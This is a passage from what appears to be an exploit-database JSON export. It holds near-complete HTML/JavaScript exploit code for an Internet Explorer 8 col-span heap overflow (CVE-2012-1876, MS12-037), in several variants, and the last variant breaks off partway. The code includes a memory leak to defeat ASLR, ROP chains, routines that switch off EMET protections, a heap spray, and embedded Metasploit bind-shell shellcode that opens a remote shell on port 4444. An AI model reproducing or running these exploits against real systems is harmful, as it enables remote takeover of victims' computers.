cbuttonlayout + 2228408; // POP ECX\n var rop = rop.toString(16);\n var rop25 = rop.substring(4,8);\n var rop26 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 1586172; // POP EAX\n var rop = rop.toString(16);\n var rop27 = rop.substring(4,8);\n var rop28 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 1589179; // MOV EAX,DWORD PTR [EAX]\n var rop = rop.toString(16);\n var rop29 = rop.substring(4,8);\n var rop30 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 1884912; // PUSH EAX\n var rop = rop.toString(16);\n var rop31 = rop.substring(4,8);\n var rop32 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 2140694; // ADD EAX,ECX\n var rop = rop.toString(16);\n var rop33 = rop.substring(4,8);\n var rop34 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 2364867; // MOV DWORD PTR [EAX],ECX\n var rop = rop.toString(16);\n var rop35 = rop.substring(4,8);\n var rop36 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 1816868; // MOV DWORD PTR DS:[ESI],EAX\n var rop = rop.toString(16);\n var rop37 = rop.substring(4,8);\n var rop38 = rop.substring(0,4); // } RET\n\n var getmodulew = cbuttonlayout + 4840; // GetModuleHandleW\n var getmodulew = getmodulew.toString(16);\n var getmodulew1 = getmodulew.substring(4,8);\n var getmodulew2 = getmodulew.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 3621437; // MOV EAX,EDX\n var rop = rop.toString(16);\n var rop41 = rop.substring(4,8);\n var rop42 = rop.substring(0,4); // } RET\n\n var shellcode = unescape(\"%u4444\");\n while (shellcode.length < 100)\n shellcode = shellcode + shellcode;\n var shellcode = shellcode.substr(0, 46);\n\n shellcode+= unescape(\"%u\"+rop1+\"%u\"+rop2); // RETN\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP # RETN\n shellcode+= unescape(\"%u\"+rop5+\"%u\"+rop6); // XCHG EAX,ESP # RETN\n\n // EMET disable part 0x01 annihilate ROP protections\n // Implement the Tachyon detection grid to overcome the Romulan cloaking device.\n shellcode+= unescape(\"%u\"+rop27+\"%u\"+rop28); // POP EAX # RETN\n shellcode+= unescape(\"%u\"+getmodulew1+\"%u\"+getmodulew2); // GetModuleHandleW Ptr\n shellcode+= unescape(\"%u\"+rop29+\"%u\"+rop30); // MOV EAX,DWORD PTR [EAX] # RETN\n shellcode+= unescape(\"%u\"+rop31+\"%u\"+rop32); // PUSH EAX # RETN\n shellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN\n shellcode+= unescape(\"%u5f3c%u07d2\"); // EMET_STRING_PTR (GetModuleHandle argument) \n shellcode+= unescape(\"%u7372%u0006\"); // Offset to \"decoding helper\" 0x67372\n shellcode+= unescape(\"%u\"+rop33+\"%u\"+rop34); // ADD EAX,ECX # RETN (Get the address of the \"decoding helper\")\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP # RETN \n shellcode+= unescape(\"%u5e84%u07d2\"); // Set EBP to successfully return from the \"decoding helper\" \n shellcode+= unescape(\"%u\"+rop31+\"%u\"+rop32); // PUSH EAX # RETN Call the \"decoding helper\"\n shellcode+= unescape(\"%u0000%u0000\");\t\t\t// Compensate for function epilogue\n shellcode+= unescape(\"%u0000%u0000\");\t\t\t// Compensate for function epilogue \n shellcode+= unescape(\"%u0000%u0000\");\t\t\t// Compensate for function epilogue\n shellcode+= unescape(\"%u0000%u0000\");\t\t\t// Compensate for function epilogue\n shellcode+= unescape(\"%u\"+rop41+\"%u\"+rop42); // MOV EAX,EDX # RETN\n shellcode+= unescape(\"%u\"+rop15+\"%u\"+rop16); // POP ESI # RETN\n shellcode+= unescape(\"%u5f38%u07d2\"); // MEM_ADDRESS_PTR (Store CONFIG_STRUCT here for later on) \n shellcode+= unescape(\"%u\"+rop37+\"%u\"+rop38); // MOV DWORD PTR DS:[ESI],EAX\n shellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN\n shellcode+= unescape(\"%u01b8%u0000\"); // offset to NtProtectVirtualMemory unhooked\n shellcode+= unescape(\"%u\"+rop33+\"%u\"+rop34); // ADD EAX,ECX # RETN (Get the address of NtProtectVirtualMemory)\n shellcode+= unescape(\"%u\"+rop29+\"%u\"+rop30); // MOV EAX,DWORD PTR [EAX] # RETN\n shellcode+= unescape(\"%u\"+rop31+\"%u\"+rop32); // PUSH EAX # RETN\n shellcode+= unescape(\"%u\"+rop27+\"%u\"+rop28); // POP EAX # RETN\n shellcode+= unescape(\"%uffff%uffff\"); // ProcessHandle\n shellcode+= unescape(\"%u5f38%u07d2\"); // *BaseAddress\n shellcode+= unescape(\"%u5f34%u07d2\"); // NumberOfBytesToProtect\n shellcode+= unescape(\"%u0040%u0000\"); // NewAccessProtection\n shellcode+= unescape(\"%u5f30%u07d2\"); // OldAccessProtection\n shellcode+= unescape(\"%u5f38%u07d2\"); // Reget pointer\n shellcode+= unescape(\"%u\"+rop29+\"%u\"+rop30); // MOV EAX,DWORD PTR [EAX] # RETN\n shellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN\n shellcode+= unescape(\"%u0558%u0000\"); // Offset to EMET mitigations switch\n shellcode+= unescape(\"%u\"+rop33+\"%u\"+rop34); // ADD EAX,ECX # RETN\n shellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN\n shellcode+= unescape(\"%u0000%u0000\"); // NULL\n shellcode+= unescape(\"%u\"+rop35+\"%u\"+rop36); // MOV DWORD PTR [EAX],ECX # RETN\n\n // Performing a standard Kumeh maneuver ... (VirtualProtect mona chain)\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP\n shellcode+= unescape(\"%u\"+rop7+\"%u\"+rop8); // POP EBX\n shellcode+= unescape(\"%u1024%u0000\"); // Size 0x00001024\n shellcode+= unescape(\"%u\"+rop9+\"%u\"+rop10); // POP EDX\n shellcode+= unescape(\"%u0040%u0000\"); // 0x00000040\n shellcode+= unescape(\"%u\"+rop11+\"%u\"+rop12); // POP ECX\n shellcode+= unescape(\"%u\"+writable1+\"%u\"+writable2); // Writable Location\n shellcode+= unescape(\"%u\"+rop13+\"%u\"+rop14); // POP EDI\n shellcode+= unescape(\"%u\"+rop1+\"%u\"+rop2); // RET\n shellcode+= unescape(\"%u\"+rop15+\"%u\"+rop16); // POP ESI\n shellcode+= unescape(\"%u\"+jmpeax1+\"%u\"+jmpeax2);// JMP EAX\n shellcode+= unescape(\"%u\"+rop17+\"%u\"+rop18); // POP EAX\n shellcode+= unescape(\"%u\"+vp1+\"%u\"+vp2); // VirtualProtect()\n shellcode+= unescape(\"%u\"+rop19+\"%u\"+rop20); // MOV EAX,DWORD PTR DS:[EAX]\n shellcode+= unescape(\"%u\"+rop21+\"%u\"+rop22); // PUSHAD\n shellcode+= unescape(\"%u\"+rop23+\"%u\"+rop24); // PUSH ESP\n\n // Store various pointers here\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\n shellcode+= unescape(\"%u9090%u18eb\"); // NOPs\n shellcode+= unescape(\"%u4242%u4242\"); // OldAccessProtection\n shellcode+= unescape(\"%u0564%u0000\"); // Size for NtVirtualProtectMemory\n shellcode+= unescape(\"%u4141%u4141\"); // Store BaseAddress address on the *stack*\n shellcode+= \"EMET\"; // EMET string\n shellcode+= unescape(\"%u0000%u0000\"); // EMET string\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\n // Store various pointers here\n\n // EMET disable part 0x02 annihilate EAF/EAF+ by calling NtSetContextThread \n // MOV EAX,DWORD PTR DS:[076D10BCH]\n // MOV EAX,DWORD PTR DS:[007D25F48H]\n // MOV ESI,DWORD PTR [EAX+518H]\n // SUB ESP,2CCH\n // MOV DWORD PTR [ESP],10010H\n // MOV EDI,ESP\n // MOV ECX,2CCH\n // ADD EDI,4\n // SUB ECX,4\n // XOR EAX,EAX\n // REP STOS BYTE PTR ES:[EDI]\n // PUSH ESP\n // PUSH 0FFFFFFFEH\n // CALL ESI\n shellcode+= unescape(\"%u38a1%ud25f%u8b07%u18b0%u0005%u8100%uccec\" +\n \"%u0002%uc700%u2404%u0010%u0001%ufc8b%uccb9\" +\n \"%u0002%u8300%u04c7%ue983%u3304%uf3c0%u54aa\" +\n \"%ufe6a%ud6ff\");\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\n // EMET disable part 0x02 end\n\n // Bind shellcode on 4444 :)\n // msf > generate -t js_le\n // windows/shell_bind_tcp - 342 bytes\n // http://www.metasploit.com\n // VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,\n // EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=\n // I would keep the shellcode the same size for better reliability :)\n\n shellcode+= unescape(\"%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b\" +\n \"%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a\" +\n \"%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf\" +\n \"%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001\" +\n \"%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18\" +\n \"%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31\" +\n \"%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03\" +\n \"%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66\" +\n \"%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489\" +\n \"%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a\" +\n \"%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32\" +\n \"%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900\" +\n \"%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050\" +\n \"%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7\" +\n \"%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857\" +\n \"%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff\" +\n \"%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789\" +\n \"%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389\" +\n \"%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7\" +\n \"%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650\" +\n \"%u5656%u5646%u564e%u5356%u6856%ucc79%u863f\" +\n \"%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d\" +\n \"%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff\" +\n \"%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72\" +\n \"%u006a%uff53%u41d5\");\n\n // Total spray should be 1000\n var padding = unescape(\"%u9090\");\n while (padding.length < 1000)\n padding = padding + padding;\n var padding = padding.substr(0, 1000 - shellcode.length);\n\n shellcode+= padding;\n\n while (shellcode.length < 100000)\n shellcode = shellcode + shellcode;\n\n var onemeg = shellcode.substr(0, 64*1024/2);\n\n for (i=0; i<14; i++) {\n onemeg += shellcode.substr(0, 64*1024/2);\n }\n\n onemeg += shellcode.substr(0, (64*1024/2)-(38/2));\n\n var spray = new Array();\n\n for (i=0; i<100; i++) {\n spray[i] = onemeg.substr(0, onemeg.length);\n }\n}\n\nfunction leak(){\n var leak_col = document.getElementById(\"132\");\n leak_col.width = \"41\";\n leak_col.span = \"19\";\n}\n\nfunction get_leak() {\n var str_addr = strtoint(bl[498].substring((0x100-6)/2+11,(0x100-6)/2+13));\n str_addr = str_addr - 1410704;\n var hex = str_addr.toString(16);\n //alert(hex);\n setTimeout(function(){heapspray(str_addr)}, 50);\n}\n\nfunction trigger_overflow(){\n var evil_col = document.getElementById(\"132\");\n evil_col.width = \"1312272\"; // 0x07D25E40\n evil_col.span = \"44\";\n}\n\nsetTimeout(function(){leak()}, 400);\nsetTimeout(function(){get_leak()},450);\nsetTimeout(function(){trigger_overflow()}, 700);\n\n</script>\n</body>\n</html>", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:32", "description": "\nMicrosoft Internet Explorer 8 - Fixed Col Span ID (Full ASLR + DEP + EMET 4.1.x Bypass) (MS12-037)", "cvss3": {}, "published": "2014-07-01T00:00:00", "type": "exploitpack", "title": "Microsoft Internet Explorer 8 - Fixed Col Span ID (Full ASLR + DEP + EMET 4.1.x Bypass) (MS12-037)", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1876"], "modified": "2014-07-01T00:00:00", "id": "EXPLOITPACK:022449B08C2DE005F39553B5E709DE12", "href": "", "sourceData": "\n\n<html>\n<body>\n<div id=\"evil\"></div>\n<table style=\"table-layout:fixed\" ><col id=\"132\" width=\"41\" span=\"9\" >\u00a0 </col></table>\n<script language='javascript'>\n\nfunction strtoint(str) {\n return str.charCodeAt(1)*0x10000 + str.charCodeAt(0);\n}\n\nvar free = \"EEEE\";\nwhile ( free.length < 500 ) free += free;\n\nvar string1 = \"AAAA\";\nwhile ( string1.length < 500 ) string1 += string1;\n\nvar string2 = \"BBBB\";\nwhile ( string2.length < 500 ) string2 += string2;\n\nvar fr = new Array();\nvar al = new Array();\nvar bl = new Array();\n\nvar div_container = document.getElementById(\"evil\");\ndiv_container.style.cssText = \"display:none\";\n\nfor (var i=0; i < 500; i+=2) {\n fr[i] = free.substring(0, (0x100-6)/2);\n al[i] = string1.substring(0, (0x100-6)/2);\n bl[i] = string2.substring(0, (0x100-6)/2);\n var obj = document.createElement(\"button\");\n div_container.appendChild(obj);\n}\n\nfor (var i=200; i<500; i+=2 ) {\n fr[i] = null;\n CollectGarbage();\n}\n\nfunction heapspray(cbuttonlayout) {\n CollectGarbage();\n var rop = cbuttonlayout + 4161; // RET\n var rop = rop.toString(16);\n var rop1 = rop.substring(4,8);\n var rop2 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 11360; // POP EBP\n var rop = rop.toString(16);\n var rop3 = rop.substring(4,8);\n var rop4 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 111675; // XCHG EAX,ESP\n var rop = rop.toString(16);\n var rop5 = rop.substring(4,8);\n var rop6 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 12377; // POP EBX\n var rop = rop.toString(16);\n var rop7 = rop.substring(4,8);\n var rop8 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 642768; // POP EDX\n var rop = rop.toString(16);\n var rop9 = rop.substring(4,8);\n var rop10 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 12201; // POP ECX --> Changed\n var rop = rop.toString(16);\n var rop11 = rop.substring(4,8);\n var rop12 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 5504544; // Writable location\n var rop = rop.toString(16);\n var writable1 = rop.substring(4,8);\n var writable2 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 12462; // POP EDI\n var rop = rop.toString(16);\n var rop13 = rop.substring(4,8);\n var rop14 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 12043; // POP ESI --> changed\n var rop = rop.toString(16);\n var rop15 = rop.substring(4,8);\n var rop16 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 63776; // JMP EAX\n var rop = rop.toString(16);\n var jmpeax1 = rop.substring(4,8);\n var jmpeax2 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 85751; // POP EAX\n var rop = rop.toString(16);\n var rop17 = rop.substring(4,8);\n var rop18 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 4936; // VirtualProtect()\n var rop = rop.toString(16);\n var vp1 = rop.substring(4,8);\n var vp2 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 454843; // MOV EAX,DWORD PTR DS:[EAX]\n var rop = rop.toString(16);\n var rop19 = rop.substring(4,8);\n var rop20 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 234657; // PUSHAD\n var rop = rop.toString(16);\n var rop21 = rop.substring(4,8);\n var rop22 = rop.substring(0,4); // } RET\n\n\n var rop = cbuttonlayout + 408958; // PUSH ESP\n var rop = rop.toString(16);\n var rop23 = rop.substring(4,8);\n var rop24 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 2228408; // POP ECX\n var rop = rop.toString(16);\n var rop25 = rop.substring(4,8);\n var rop26 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 1586172; // POP EAX\n var rop = rop.toString(16);\n var rop27 = rop.substring(4,8);\n var rop28 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 1589179; // MOV EAX,DWORD PTR [EAX]\n var rop = rop.toString(16);\n var rop29 = rop.substring(4,8);\n var rop30 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 1884912; // PUSH EAX\n var rop = rop.toString(16);\n var rop31 = rop.substring(4,8);\n var rop32 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 2140694; // ADD EAX,ECX\n var rop = rop.toString(16);\n var rop33 = rop.substring(4,8);\n var rop34 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 2364867; // MOV DWORD PTR [EAX],ECX\n var rop = rop.toString(16);\n var rop35 = rop.substring(4,8);\n var rop36 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 5036248; // ADD ESP,0C\n var rop = rop.toString(16);\n var rop37 = rop.substring(4,8);\n var rop38 = rop.substring(0,4); // } RET\n\n var getmodulew = cbuttonlayout + 4840; // GetModuleHandleW\n var getmodulew = getmodulew.toString(16);\n var getmodulew1 = getmodulew.substring(4,8);\n var getmodulew2 = getmodulew.substring(0,4); // } RET\n\n var getprocaddr = cbuttonlayout + 4836; // GetProcAddress\n var getprocaddr = getprocaddr.toString(16);\n var getprocaddr1 = getprocaddr.substring(4,8);\n var getprocaddr2 = getprocaddr.substring(0,4); // } RET\n\n var shellcode = unescape(\"%u4141%u4141%u4242%u4242%u4343%u4343\"); // PADDING\n shellcode+= unescape(\"%u4141%u4141%u4242%u4242%u4343%u4343\"); // PADDING\n shellcode+= unescape(\"%u4141%u4141\"); // PADDING\n\n shellcode+= unescape(\"%u\"+rop1+\"%u\"+rop2); // RETN\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP # RETN\n shellcode+= unescape(\"%u\"+rop5+\"%u\"+rop6); // XCHG EAX,ESP # RETN\n\n // EMET disable part 0x01\n // Implement the Tachyon detection grid to overcome the Romulan cloaking device.\n shellcode+= unescape(\"%u\"+rop27+\"%u\"+rop28); // POP EAX # RETN\n shellcode+= unescape(\"%u\"+getmodulew1+\"%u\"+getmodulew2); // GetModuleHandleW\n shellcode+= unescape(\"%u\"+rop29+\"%u\"+rop30); // MOV EAX,DWORD PTR [EAX] # RETN\n shellcode+= unescape(\"%u\"+rop31+\"%u\"+rop32); // PUSH EAX # RETN\n shellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN\n shellcode+= unescape(\"%u101C%u076d\"); // EMET string\n shellcode+= unescape(\"%ue220%u0007\"); // EMET offset\n shellcode+= unescape(\"%u\"+rop33+\"%u\"+rop34); // ADD EAX,ECX # RETN\n shellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN\n shellcode+= unescape(\"%u0000%u0000\"); // Zero out ECX\n shellcode+= unescape(\"%u\"+rop35+\"%u\"+rop36); // MOV DWORD PTR [EAX],ECX # RETN\n shellcode+= unescape(\"%u\"+rop37+\"%u\"+rop38); // ADD ESP,0C # RETN\n shellcode+= \"EMET\"; // EMET string\n shellcode+= unescape(\"%u0000%u0000\"); // EMET string\n // EMET disable part 0x01 end\n\n // Performing a standard Kumeh maneuver ... (VirtualProtect mona chain)\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP\n shellcode+= unescape(\"%u\"+rop7+\"%u\"+rop8); // POP EBP\n shellcode+= unescape(\"%u1024%u0000\"); // Size 0x00001024\n shellcode+= unescape(\"%u\"+rop9+\"%u\"+rop10); // POP EDX\n shellcode+= unescape(\"%u0040%u0000\"); // 0x00000040\n shellcode+= unescape(\"%u\"+rop11+\"%u\"+rop12); // POP ECX\n shellcode+= unescape(\"%u\"+writable1+\"%u\"+writable2); // Writable Location\n shellcode+= unescape(\"%u\"+rop13+\"%u\"+rop14); // POP EDI\n shellcode+= unescape(\"%u\"+rop1+\"%u\"+rop2); // RET\n shellcode+= unescape(\"%u\"+rop15+\"%u\"+rop16); // POP ESI\n shellcode+= unescape(\"%u\"+jmpeax1+\"%u\"+jmpeax2); // JMP EAX\n shellcode+= unescape(\"%u\"+rop17+\"%u\"+rop18); // POP EAX\n shellcode+= unescape(\"%u\"+vp1+\"%u\"+vp2); // VirtualProtect()\n shellcode+= unescape(\"%u\"+rop19+\"%u\"+rop20); // MOV EAX,DWORD PTR DS:[EAX]\n shellcode+= unescape(\"%u\"+rop21+\"%u\"+rop22); // PUSHAD\n shellcode+= unescape(\"%u\"+rop23+\"%u\"+rop24); // PUSH ESP\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\n\n // EMET disable part 0x02\n // Execute the Corbomite bluff to disarm EAF\n shellcode+= unescape(\"%uc0b8%u6d10\");\n shellcode+= unescape(\"%u8b07%u8b00\");\n shellcode+= unescape(\"%u6800%u10c8\");\n shellcode+= unescape(\"%u076d%ud0ff\");\n shellcode+= unescape(\"%ud468%u6d10\");\n shellcode+= unescape(\"%u5007%uc4b8\");\n shellcode+= unescape(\"%u6d10%u8b07\");\n shellcode+= unescape(\"%u8b00%uff00\");\n shellcode+= unescape(\"%u8bd0%u81f0\");\n shellcode+= unescape(\"%uccec%u0002\");\n shellcode+= unescape(\"%uc700%u2404\");\n shellcode+= unescape(\"%u0010%u0001\");\n shellcode+= unescape(\"%ufc8b%uccb9\");\n shellcode+= unescape(\"%u0002%u8300\");\n shellcode+= unescape(\"%u04c7%ue983\");\n shellcode+= unescape(\"%u3304%uf3c0\");\n shellcode+= unescape(\"%u54aa%ufe6a\");\n shellcode+= unescape(\"%ud6ff%u9090\");\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\n shellcode+= unescape(\"%u9090%u29eb\"); // NOPs\n shellcode+= unescape(\"%u\"+getmodulew1+\"%u\"+getmodulew2); // GetModuleHandleW\n shellcode+= unescape(\"%u\"+getprocaddr1+\"%u\"+getprocaddr2); // GetProcAddress\n shellcode+= \"NTDLL\";\n shellcode+= unescape(\"%u0000\");\n shellcode+= unescape(\"%u744e%u6553\"); // NtSetContextThread\n shellcode+= unescape(\"%u4374%u6e6f\");\n shellcode+= unescape(\"%u6574%u7478\");\n shellcode+= unescape(\"%u6854%u6572\");\n shellcode+= unescape(\"%u6461%u0000\");\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\n // EMET disable part 0x02 end\n\n // Bind shellcode on 4444 :)\n // msf > generate -t js_le\n // windows/shell_bind_tcp - 342 bytes\n // http://www.metasploit.com\n // VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,\n // EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=\n // I would keep the shellcode the same size for better reliability :)\n\n shellcode+= unescape(\"%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b\" +\n \"%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a\" +\n \"%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf\" +\n \"%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001\" +\n \"%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18\" +\n \"%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31\" +\n \"%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03\" +\n \"%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66\" +\n \"%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489\" +\n \"%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a\" +\n \"%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32\" +\n \"%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900\" +\n \"%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050\" +\n \"%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7\" +\n \"%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857\" +\n \"%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff\" +\n \"%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789\" +\n \"%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389\" +\n \"%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7\" +\n \"%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650\" +\n \"%u5656%u5646%u564e%u5356%u6856%ucc79%u863f\" +\n \"%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d\" +\n \"%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff\" +\n \"%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72\" +\n \"%u006a%uff53%u41d5\");\n\n // Total spray should be 1000\n var padding = unescape(\"%u9090\");\n while (padding.length < 1000)\n padding = padding + padding;\n var padding = padding.substr(0, 1000 - shellcode.length);\n\n shellcode+= padding;\n\n while (shellcode.length < 100000)\n shellcode = shellcode + shellcode;\n\n var onemeg = shellcode.substr(0, 64*1024/2);\n\n for (i=0; i<14; i++) {\n onemeg += shellcode.substr(0, 64*1024/2);\n }\n\n onemeg += shellcode.substr(0, (64*1024/2)-(38/2));\n\n var spray = new Array();\n\n for (i=0; i<100; i++) {\n spray[i] = onemeg.substr(0, onemeg.length);\n }\n}\n\nfunction leak(){\n var leak_col = document.getElementById(\"132\");\n leak_col.width = \"41\";\n leak_col.span = \"19\";\n}\n\nfunction get_leak() {\n var str_addr = strtoint(bl[498].substring((0x100-6)/2+11,(0x100-6)/2+13));\n str_addr = str_addr - 1410704;\n var hex = str_addr.toString(16);\n //alert(hex);\n setTimeout(function(){heapspray(str_addr)}, 50);\n}\n\nfunction trigger_overflow(){\n var evil_col = document.getElementById(\"132\");\n evil_col.width = \"1245880\";\n evil_col.span = \"44\";\n}\n\nsetTimeout(function(){leak()}, 400);\nsetTimeout(function(){get_leak()},450);\nsetTimeout(function(){trigger_overflow()}, 700);\n\n</script>\n</body>\n</html>", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:32", "description": "\nMicrosoft Internet Explorer 8 - Fixed Col Span ID (Full ASLR + DEP Bypass) (MS12-037)", "cvss3": {}, "published": "2013-01-10T00:00:00", "type": "exploitpack", "title": "Microsoft Internet Explorer 8 - Fixed Col Span ID (Full ASLR + DEP Bypass) (MS12-037)", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1876"], "modified": "2013-01-10T00:00:00", "id": "EXPLOITPACK:B3A5822873FF7E264F097AB7EE9F4396", "href": "", "sourceData": "\n\n<html>\n<body>\n<div id=\"evil\"></div>\n<table style=\"table-layout:fixed\" ><col id=\"132\" width=\"41\" span=\"9\" >\u00a0 </col></table>\n<script language='javascript'>\n\nfunction strtoint(str) {\n return str.charCodeAt(1)*0x10000 + str.charCodeAt(0);\n}\n\nvar free = \"EEEE\";\nwhile ( free.length < 500 ) free += free;\n\nvar string1 = \"AAAA\";\nwhile ( string1.length < 500 ) string1 += string1;\n\nvar string2 = \"BBBB\";\nwhile ( string2.length < 500 ) string2 += string2;\n\nvar fr = new Array();\nvar al = new Array();\nvar bl = new Array();\n\nvar div_container = document.getElementById(\"evil\");\ndiv_container.style.cssText = \"display:none\";\n\nfor (var i=0; i < 500; i+=2) {\n fr[i] = free.substring(0, (0x100-6)/2);\n al[i] = string1.substring(0, (0x100-6)/2);\n bl[i] = string2.substring(0, (0x100-6)/2);\n var obj = document.createElement(\"button\");\n div_container.appendChild(obj);\n}\n\nfor (var i=200; i<500; i+=2 ) {\n fr[i] = null;\n CollectGarbage();\n}\n\nfunction heapspray(cbuttonlayout) {\n CollectGarbage();\n var rop = cbuttonlayout + 4161; // RET\n var rop = rop.toString(16);\n var rop1 = rop.substring(4,8);\n var rop2 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 11360; // POP EBP\n var rop = rop.toString(16);\n var rop3 = rop.substring(4,8);\n var rop4 = 